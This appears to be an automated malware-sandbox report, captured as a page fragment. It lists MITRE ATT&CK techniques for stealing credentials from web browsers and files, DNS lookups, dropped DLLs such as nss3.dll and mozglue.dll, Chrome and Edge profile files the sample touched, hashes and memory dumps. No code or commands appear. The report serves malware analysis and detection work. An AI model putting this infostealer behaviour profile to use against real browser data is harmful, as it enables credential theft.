DNS Request

251.206.132.45.in-addr.arpa
8.8.8.8:53

168.117.168.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

168.117.168.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
817c651ea7da5b6e0d912a3a4bb80756

SHA1
0c0c9108df1582cfab0fdd0f619f17b87cfb6d09

SHA256
cba0cc792038ef315eb617ebe1eb68fc3941d74738476df7bdb85cefeb1f3c27

SHA512
b298e677386404c392e03c2881317048e2a4b52ab064813f69fcdda3c8752acd18ac264a57d09b2a65333b39b97cbb0957a49344714e0e83b5d115519d0c0bdc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

Filesize
44KB

MD5
7ce32692a7bec45c05946b437e030b26

SHA1
91089102e0221d95d370372d912c212af71c5269

SHA256
dc7fa5405e07f36bcb1edcfe444ffa3e3de447fc8b7122e4bf9122869aeac1c9

SHA512
0a2e47606ffa0b585c045d3cdc2f0bf2f63b6cf700abbaa182350f40188b7b80969eecf01a744b8c319d9baae6ebf902c00166047825bb01efc573c487c29b79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

Filesize
264KB

MD5
b4d9fc31bb95b4591c754a52f1727c4a

SHA1
d75764b07590698e42cf14b83115321976d0839b

SHA256
7072c9415a5a8dc0837d9728f45cc42b2afd51faf7590a53ca5bc912564d76df

SHA512
c32a9011bb4f5dd16ece5aae5d5bfc511e62493832c915afd3bf346062b59b72fc9a304543e9c576348cf9a14afb45bac3f44f6082d9d08d8b01b05301cced68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2

Filesize
1.0MB

MD5
a14adbf12328eedde3f49494abe4de26

SHA1
65b8ed0a6d09b1f94341341e691e1c87e442db29

SHA256
4e4d6f930448c69bdf6aa163bf3cb5f96a40617f3950f8862276e454ca17659e

SHA512
522b82fe5b8e150b7aa591d313d07e861d01aefc760ee31aed9650a9f3016d459602aaf9692917341c85daa2c6e9364ebdb9dc63f4514169c7bd3f6f1fd8aa9f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

Filesize
160KB

MD5
680c8b8823b7d60fe3e68688ea4883ae

SHA1
b12c394c37fb25eef3e3c8a588961fc0d31d32aa

SHA256
e75920f971faa88e975703aa4e176808af9d510776de2ccbbbabe6db49dd3d56

SHA512
f3232f580ae0541d6db23f6ee58907106df74609c10c0453faf9f39b818c7813b79df9e9b03011d7ab163c4d37c62b3dabed0d6d1c34d18ef0feaef9e86387f0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL

Filesize
36KB

MD5
4ca976bcf79d7b86bcbfc1c4d6fc28f4

SHA1
066d85a6273fa0e20928ff1b6b3bf2c72d31d649

SHA256
2136f87c57bffc725d15ed3418ad94626a182b4e8995924af7671740bc088faa

SHA512
eefa6564fc405525a3a59ff083c4c42402afa0b55d47b367691eebf2d5aa0646f28fac91049e12e6bc215d13a3e754194058fbe0090458cf11924b5cdac61994

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
f4680473bdfa95d4fc15975929e91ee1

SHA1
67d2cff0d3e6107de4e95fa17b80c95944138f1c

SHA256
60920c23ca46b5f85ab3d1d8dd2d591870556eb29fb332d148333bf80c117298

SHA512
5d02103145316abc6a63f0075d272e468aad15ba9b215eadfae7876d2167a7af39894408cfa2d523c1720186259ac99944fcba08453e620c5930038c6da746ba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3ce36f797990342c2c36cad0e30beeae

SHA1
722b137de032491b8bc8248921719187570987d9

SHA256
90a6b7fadc961a17dbdd4b061dc8e744d5a24dcf6ac106591fb8961ca3b3b95f

SHA512
0c866584c958bd69f3bbdc4dd502ff8472b05a75accf6aabb7858a41187f3678a105d38af0fa7f1d8940fa67484b66386f6b3f9eec79c80fdf53dbc646cfc8a0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5332d233ee7470c265e12cac57ee8d34

SHA1
4d1a86ff10a6e692f89f3771622bc23d65a0c4cc

SHA256
7a2501d5946da0def6d3d013e9a3e9838bdedcba1287a296e3bd644eefe71557

SHA512
20e1b77ce955152d2e1e3f77b2c55ba39fd70eb74dda8c47802731876e4ba9d0535d7b98b0a2978e62ef353ddfd3aa03b0e1fb0ac64c3330c1402f0dc196d2c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
32147d553e10d237d3a19be2ba8fed86

SHA1
99d04be3c6b2a88d80ca1a0c886a19d65c4ade20

SHA256
273faa3e388bc7d662533090119fbec4ae14948def22c6aea5ac7896a02f7217

SHA512
0ccb22e63bee76a992f8952237e851dccf8eb8cb73df437a15ec2647ae7b112b581ad4784448a9b9ae63ae7d16b43413dded11cfb9c526d0d923a3d74456e0ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
8f50deb4e4e10f5798b9f23d2c183d29

SHA1
a6be72464d3e665e72e788790ad8d259f14f94f0

SHA256
f898b26accccaf8f0fc7ad414bce22f3bb5c89cf775dbc254a2ce8b4be9e1972

SHA512
881c1abf1c56910d47347994e2d49810fd0416b5259b98f9edfc1131fde386a522715c8753128056964d38ac2e5c214b676cca642b83bf1c541fdb5bbae4967a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ded571b0d206bb08c831d1aa4556cbf3

SHA1
12c6542941e4375452107021bb5ff0f26333244a

SHA256
bc99b10d74c59d0c837d4ed8025cbddac38d0dc6198c3839a99567ab4ad1616a

SHA512
503b8b7d05413c650ef78e395ebce3f4ee1b0aa7f93df9c317ce2535ef3fc8c1c6e1fd3b70f79882c9345bd18717007dcc7398cf3c7f21c078f2d1e31f366c1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7a25ec403539b3382d6630c75c2fc3bc

SHA1
02af1f1b33efdc6f9048180498424ee8b3a9b0af

SHA256
61cb2edc0dbc24dbbd707ff38d45e9706756e801e622315e180b8cd1c6004445

SHA512
e37df1ff9daec0644942c85bb875b5ee8e55907cc6d818857eb90347c7062a047133e262301f4dfd667d570ee158d750900646f6666848e17966fe0055b132bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
59d625c1bf701318718a4969b4a54152

SHA1
adfabb24466cda91b20a80eac0adaeb149cb2a56

SHA256
e7c4f5f61f3d7c706105c08951bdc8d5ac4271367980200c6b75e0b399145dd3

SHA512
5ec95b6b5fbae4335292a681667752cbc740f0ee56ad879aaf20196675c8fcba9b0d4c9d131a9a928bb66cfd60279fd460367cf122d0ec5f015530a4042a4684

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1ae3b35a5bdc551ddabdd1eeb8917c76

SHA1
a1ad68a0131402c36e9e91d4897c4912781d0f6d

SHA256
38893a55edb14306139535b627505015bb33ecd8e84dea52648c379a493a34ca

SHA512
9bb390afbb614a7f6a733f596f19e7192f65c760aae4b13027ea63a46db47390da5d1101b933801fe34c27294af28ab9e6f56f0f11aec1856722cbc0ba3e4a17

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
89e5aeeb8de994837dcedc1db45b31ee

SHA1
7ca98dd10f0bd27164f113f11d3736953f430ab0

SHA256
5691acf28c9dbdab6f10ccdffaf70002e4ac2b6d55b41615f1ea7da89a30c81f

SHA512
67310db34c9c0390015e5439caf76f66a019cdaf05298c4c20fdbee04421c83a17b7936f9baaf3e9d554436dbb809e31fed9fab085bedc67a8a8f4508f0f38c5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
61a77661bb5124dc351a1dd739af29fc

SHA1
05a3f3ab59463ed4c87714d4eba115618723e952

SHA256
2eab6d8c11a10f74b896ac657041f90cfe295babb6729c89aad740eeb1e464f4

SHA512
70af75ccccb80d5bcc57f392b51704ec97f7d9371bcb5c0eea96b35ee08eb96153691b4ae16f7a09a27c4432b35518ef170be952e81b2768b142e6c42a772076

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9c7f5930801bb3c2f09bb3d25044eea0

SHA1
dbcd62ea7516f21ad1621cd76ce543309eefea65

SHA256
2e4306bba3eaad501f74b24d5a705d64793e328848daeb0664bd047d8dd0c6cc

SHA512
b73d7648887ae213b4706e7150aa9a99ecc41174193e09297ebad69858a41600d4e50bdec5abf7c867b3ece29f83897e020f0161602dc376e3c4788f2cfae712

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
84a4105663f0272c6008d007361eb326

SHA1
8e4f2a744c46522d6ca1d2fe370d67ae8506e6ef

SHA256
6266413c58f4c2423c6e744f87e1e1f200fe5abd38d23f020405fe667cca69b3

SHA512
e096483567bcf76fc49cf86ee434f94a925cd40ff6e7d5450ccacb720c54cb0d27fce654d30c467d08c3d39406d35ea1315e773f68d922a60466e3ce8bc7abf2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
72c0dbafa2eba27fc5a95a0abe2e627f

SHA1
293dcbdd582ab997318df80140e3252564375629

SHA256
f3effcba1e36ad712a96ca10533353cb05c85fd3c3646a4355411753b1c22b2b

SHA512
467c6e59d9105e731c5c0c57bf25e2291037a8ab2c023a19ec33ab290d9393567928cabe8d9d0879530a546c272267e2bfce78749af82d67c24cd615d2b89cb3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
8cfbb5b20d7c26f5a3dd34104b9c95a1

SHA1
07ba9b2ce143f7127b2d1eb741b9a3be8d87b8e2

SHA256
09550929fe8568ad1345c53f5a8f94105b5d8259afc1056f66836550ca2bdfd1

SHA512
cdf250779ce7b753888c9917f61b0046d2ee3b82b628103f4c304d479c17d19df6e83419e32f2db8d5f1ab03ae4be9aeef0d26d7634e7c422c1f29da7a06fa09

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
3d44a6a57b9842ad72d76b8138bd2e5a

SHA1
3f5943868fa930d0dc4d5028b67902fb97712844

SHA256
6bc918e6874bd4e9adf1ec759832821132b325ed75517054b38874f0101ec028

SHA512
1a7532ca1fd2197356a007b45f09c21a420b1042cee79d4cf38ad60a5f6b14a53f1b778d6b652a11165d8e46c68521ace4e9691e2ccef64bf1677c78273a5439

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\Downloads\KeyFile\1049\sharedmanagementobjects_keyfile.dll

Filesize
23KB

MD5
5e54cb9759d1a9416f51ac1e759bbccf

SHA1
1a033a7aae7c294967b1baba0b1e6673d4eeefc6

SHA256
f7e5cae32e2ec2c35346954bfb0b7352f9a697c08586e52494a71ef00e40d948

SHA512
32dcca4432ec0d2a8ad35fe555f201fef828b2f467a2b95417b42ff5b5149aee39d626d244bc295dca8a00cd81ef33a20f9e681dd47eb6ee47932d5d8dd2c664

Download Submit
memory/544-477-0x0000000025D60000-0x0000000025FBF000-memory.dmp

Filesize
2.4MB

Download
memory/544-467-0x0000000000BD0000-0x000000000171D000-memory.dmp

Filesize
11.3MB

Download
memory/544-465-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

Filesize
4KB

Download
memory/544-464-0x0000000000BD0000-0x000000000171D000-memory.dmp

Filesize
11.3MB

Download
memory/544-559-0x0000000000BD0000-0x000000000171D000-memory.dmp

Filesize
11.3MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request